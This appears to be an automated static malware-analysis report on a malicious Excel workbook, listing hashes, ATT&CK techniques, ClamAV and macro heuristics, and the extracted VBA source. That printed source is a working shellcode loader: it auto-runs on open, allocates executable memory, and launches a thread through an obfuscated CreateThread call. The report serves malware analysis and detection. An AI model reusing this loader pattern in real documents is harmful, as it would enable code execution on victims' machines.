Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 acb6fc5b690a01b3…

MALICIOUS

Office (OOXML)

16.2 KB Created: 2021-10-18 14:56:53 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-10-27
MD5: 36c05e521d25bbf728527f10d58c16da SHA-1: 154b50027a567becde88daece50382f20a718542 SHA-256: acb6fc5b690a01b3ad7fe8501392b664e3d80944a8ce4eeb88474ac1d86d933a
164 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Office document containing VBA macros, specifically triggering AutoOpen and Workbook_Open events. The VBA code attempts to allocate memory and execute shellcode, likely to download and run a secondary payload. ClamAV detection further confirms its malicious nature as a downloader.

Heuristics 5

  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Sub
Sub AutoOpen()
        Auto_Open
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
Sub Workbook_Open()
        Auto_Open
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
        Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long, i As Long, n As Long

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1653 bytes
SHA-256: 7e9c5a11417893c7708be6a5daea956bfb54abcc814c762f28687c02a87098e4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"


Function VBA_Evaluate(Input_String As String)
Application.Volatile
VBA_Evaluate = Application.Evaluate(Input_String)
End Function

Sub Auto_Open()
        Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long, i As Long, n As Long
#If VBA7 Then
        Dim Xlbufvetp As LongPtr
#Else
        Dim Xlbufvetp As Long
#End If

   

        Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
        For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
                Wyzayxya = Hyeyhafxp(Zolde)
                Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
        Next Zolde
        Dim p1 As String, p2 As String, p3 As String, p4 As String, p5 As String
        p1 = "Cr"
        p2 = "ea"
        p3 = "teT"
        p4 = "hre"
        p5 = "ad"
        VBA_Evaluate (p1 & p2 & p3 & p4 & p5 & "(0, 0, " & Xlbufvetp & ", 0, 0, 0)")
End Sub
Sub AutoOpen()
        Auto_Open
End Sub
Sub Workbook_Open()
        Auto_Open
End Sub





Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 19456 bytes
SHA-256: 0b509edfacfd23744fd191ce6d4a1377e99b92732b1a77411c95bcfc1daac193
Detection
ClamAV: Doc.Downloader.Generic-6698421-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.